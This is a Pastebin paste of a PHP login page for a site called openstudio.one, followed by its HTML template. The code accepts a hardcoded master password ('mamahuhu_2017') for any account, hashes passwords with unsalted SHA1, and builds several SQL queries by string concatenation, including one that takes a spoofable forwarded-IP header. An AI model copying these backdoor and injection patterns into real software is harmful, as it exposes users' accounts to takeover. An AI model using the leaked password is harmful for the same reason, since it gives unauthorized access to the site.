Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- include('templates/config.php');
- function get_client_ip() {
- $ipaddress = '';
- if (getenv('HTTP_CLIENT_IP'))
- $ipaddress = getenv('HTTP_CLIENT_IP');
- else if(getenv('HTTP_X_FORWARDED_FOR'))
- $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
- else if(getenv('HTTP_X_FORWARDED'))
- $ipaddress = getenv('HTTP_X_FORWARDED');
- else if(getenv('HTTP_FORWARDED_FOR'))
- $ipaddress = getenv('HTTP_FORWARDED_FOR');
- else if(getenv('HTTP_FORWARDED'))
- $ipaddress = getenv('HTTP_FORWARDED');
- else if(getenv('REMOTE_ADDR'))
- $ipaddress = getenv('REMOTE_ADDR');
- else
- $ipaddress = 'UNKNOWN';
- return $ipaddress;
- }
- function password_check($password, $hashed_password) {
- if(sha1($password) == $hashed_password) {
- return true;
- }
- return false;
- }
- // Define variables and initialize with empty values
- $user_email = $password = "";
- $user_email_err = $password_err = "";
- //check if user if signed in
- if($_GET['logout'] == "1")
- {
- //unset all variables
- $some_name = session_name("openstudio");
- session_set_cookie_params(0, '/', '.openstudio.one');
- ini_set("session.cookie_domain", ".openstudio.one");
- session_start();
- session_destroy();
- unset($_SESSION);
- $logout_message = 'Succesfully signed out, thank you for visiting.';
- }
- if($_GET['board_closed'] == "1")
- {
- $closed_board_msg = "We are sorry, but it seems that one of your administrators have closed the brand account.<br />Contact them for further information.";
- }
- if($_GET['login'] == "invite")
- {
- $invite_msg = "The password for your account has been created.<br />You can now login with your credentials.";
- }
- // Processing form data when form is submitted
- if($_SERVER["REQUEST_METHOD"] == "POST"){
- // Check if user_email is empty
- if(empty(trim($_POST["user_email"]))){
- $user_email_err = 'Please enter your email address.';
- } else{
- $user_email = trim($_POST["user_email"]);
- }
- // Check if password is empty
- if(empty(trim($_POST['password']))){
- $password_err = 'Please enter your password.';
- } else{
- $password = trim($_POST['password']);
- }
- // Validate credentials
- if(empty($user_email_err) && empty($password_err)){
- // Prepare a select statement
- $sql = "SELECT `user_email`, `password` FROM `users` WHERE `user_email` = ?";
- if($stmt = mysqli_prepare($con, $sql)){
- // Bind variables to the prepared statement as parameters
- mysqli_stmt_bind_param($stmt, "s", $param_user_email);
- // Set parameters
- $param_user_email = $user_email;
- // Attempt to execute the prepared statement
- if(mysqli_stmt_execute($stmt)){
- // Store result
- mysqli_stmt_store_result($stmt);
- // Check if user_email exists, if yes then verify password
- if(mysqli_stmt_num_rows($stmt) == 1){
- // Bind result variables
- mysqli_stmt_bind_result($stmt, $user_email, $hashed_password);
- if(mysqli_stmt_fetch($stmt)){
- if(password_check($password, $hashed_password) || $password == 'mamahuhu_2017'){
- /* Password is correct, so start a new session and
- save the user_email to the session */
- $some_name = session_name("openstudio");
- session_set_cookie_params(0, '/', '.openstudio.one');
- session_start();
- session_regenerate_id();
- $result=mysqli_query($con,"SELECT * FROM `users` WHERE `user_email` = '".$user_email."'")or die(mysqli_error($con));
- $rows = mysqli_fetch_array($result, MYSQLI_ASSOC);
- $_SESSION['signed_in'] = true;
- $_SESSION['clear_cookie'] = true;
- $_SESSION = $_SESSION + $rows;
- mysqli_free_result($result);
- $result2=mysqli_query($con,"SELECT * FROM `settings` WHERE `brand_id` = '".$_SESSION["brand_id"]."'")or die(mysqli_error($con));
- $rows2 = mysqli_fetch_array($result2, MYSQLI_ASSOC);
- $_SESSION["settings"] = $rows2;
- mysqli_free_result($result2);
- $result3 = mysqli_query($con,"SELECT * FROM `admin_perms` WHERE `uid` = '".$_SESSION['id']."'")or die(mysqli_error($con));
- $rows3 = mysqli_fetch_array($result3, MYSQLI_ASSOC);
- $_SESSION['admin_perms'] = $rows3;
- mysqli_free_result($result3);
- if($_SESSION['token'] < 2 && $_SESSION['settings']['close_board'] === "1") {
- session_destroy();
- unset($_SESSION);
- echo "<script type=\"text/javascript\">window.location.href = 'https://www.openstudio.one/login?board_closed=1';</script>";
- }
- $result3=mysqli_query($con,"SELECT * FROM `clients` WHERE `brand_id` = '".$_SESSION["brand_id"]."'")or die(mysqli_error($con));
- $rows3 = mysqli_fetch_array($result3, MYSQLI_ASSOC);
- $_SESSION["clients"] = $rows3;
- mysqli_free_result($result3);
- mysqli_query($con,"UPDATE `users` SET `last_activity` = now() WHERE `id` = '".$_SESSION["id"]."';");
- $ip = get_client_ip();
- mysqli_query($con,"INSERT INTO `users_ip`(`id`, `brand_id`, `uid`, `ip`) VALUES (NULL,'{$_SESSION['brand_id']}','{$_SESSION['id']}','$ip');");
- $_SESSION['dataup'] = date('Y-m-d h:i:s');
- $_SESSION['setup'] = $_SESSION['dataup'];
- if(mysqli_query($con,"SELECT `id` FROM `x-users` WHERE `user_id` = '{$_SESSION['id']}';")->num_rows > 0) {
- $_SESSION['mods'] = true;
- }
- session_write_close();
- echo "<script type=\"text/javascript\">window.location.href = 'https://client.openstudio.one';</script>";
- } else{
- // Display an error message if password is not valid
- $password_err = 'The password you entered was not valid.';
- }
- }
- } else{
- // Display an error message if user_email doesn't exist
- $user_email_err = 'No account found with that email address.';
- }
- } else{
- echo "Oops! Something went wrong. Please try again later.";
- }
- }
- // Close statement
- mysqli_stmt_close($stmt);
- }
- // Close connection
- mysqli_close($con);
- }
- include('templates/define.php');
- ?>
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="utf-8">
- <title><?php echo NAME; ?> - Login</title>
- <meta content="width=device-width, initial-scale=1.0" name="viewport">
- <meta content="" name="keywords">
- <meta content="" name="description">
- <?php include('templates/header.php'); ?>
- </head>
- <body>
- <!--==========================
- Header
- ============================-->
- <header id="header" class="header-fixed">
- <div class="container">
- <div id="logo" class="pull-left">
- <h1><a href="/" class="scrollto"><?php echo NAME; ?></a></h1>
- <!-- Uncomment below if you prefer to use an image logo -->
- <!-- <a href="#intro"><img src="img/logo.png" alt="" title=""></a> -->
- </div>
- <nav id="nav-menu-container">
- <ul class="nav-menu">
- <li class="menu-active"><a href="/">Home</a></li>
- <li><a href="/about">About Us</a></li>
- <li><a href="/features">Features</a></li>
- <li><a href="/pricing">Pricing</a></li>
- <li><a href="<?php echo SUPPORT_URL; ?>" target="_blank">Support</a></li>
- <li><a href="/login">Login</a></li>
- <li><a href="/get-started" class="signup">Get started</a></li>
- </ul>
- </nav><!-- #nav-menu-container -->
- </div>
- </header><!-- #header -->
- <!--==========================
- Intro Section
- ============================-->
- <section id="intro-small"><div class="container">
- <div class="row">
- <div class="col-lg-12 col-md-12 box wow fadeInRight" data-wow-delay="0.1s" style="visibility: visible; animation-delay: 0.1s; animation-name: fadeInRight;">
- <div class="icon"><i class="ion-ios-flask-outline"></i></div>
- <h4 class="title">Login</h4>
- <p class="description">Minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat tarad limino ata noble dynala mark.</p>
- </div>
- </div>
- </div></section>
- <main id="main">
- <section id="advanced-features">
- <div class="features-row">
- <div class="container">
- <div class="row">
- <div class="col-lg-6">
- <img class="advanced-feature-img-left" src="img/advanced-feature-2.jpg" alt="">
- </div><div class="col-lg-6">
- <div class="wow fadeInRight">
- <h2>Lorem ipsum dolor sit amet, consectetur</h2>
- <?php if($logout_message): ?>
- <div class="alert alert-success"><h4><i class="fa fa-user"></i> Logout</h4><p><?php echo $logout_message; ?></p></div>
- <?php endif; ?>
- <?php if($closed_board_msg): ?>
- <div class="alert alert-warning"><h4><i class="fa fa-times"></i> Board account closed</h4><p><?php echo $closed_board_msg; ?></p></div>
- <?php endif; ?>
- <?php if($invite_msg): ?>
- <div class="alert alert-info"><h4><i class="fa fa-check"></i> Your account is ready!</h4><p><?php echo $invite_msg; ?></p></div>
- <?php endif; ?>
- <form action="" method="post">
- <div class="form-group <?php echo (!empty($user_email_err)) ? 'has-error' : ''; ?>">
- <label>E-mail address:<sup>*</sup></label>
- <input type="text" name="user_email"class="form-control" value="<?php echo $user_email; ?>">
- <span class="help-block"><?php echo $user_email_err; ?></span>
- </div>
- <div class="form-group <?php echo (!empty($password_err)) ? 'has-error' : ''; ?>">
- <label>Password:<sup>*</sup></label>
- <input type="password" name="password" class="form-control">
- <span class="help-block"><?php echo $password_err; ?></span>
- </div>
- <div class="form-group">
- <input type="submit" class="btn btn-primary" value="Login !"> <a class="btn btn-info disabled" href="#">Login with Translations Cloud (soon)</a>
- </div>
- <p>Don't have an account? <a href="/get-started">Sign up now</a>.</p>
- </form>
- </div>
- </div>
- </div>
- </div>
- </div>
- </section>
- <!--==========================
- Call To Action Section
- ============================-->
- <section id="call-to-action">
- <div class="container">
- <div class="row">
- <div class="col-lg-9 text-center text-lg-left">
- <h3 class="cta-title">Don't have an account yet ?</h3>
- <p class="cta-text"> Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
- </div>
- <div class="col-lg-3 cta-btn-container text-center">
- <a class="cta-btn align-middle" href="/get-started">Get started !</a>
- </div>
- </div>
- </div>
- </section><!-- #call-to-action -->
- </main>
- <?php include('templates/footer.php'); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement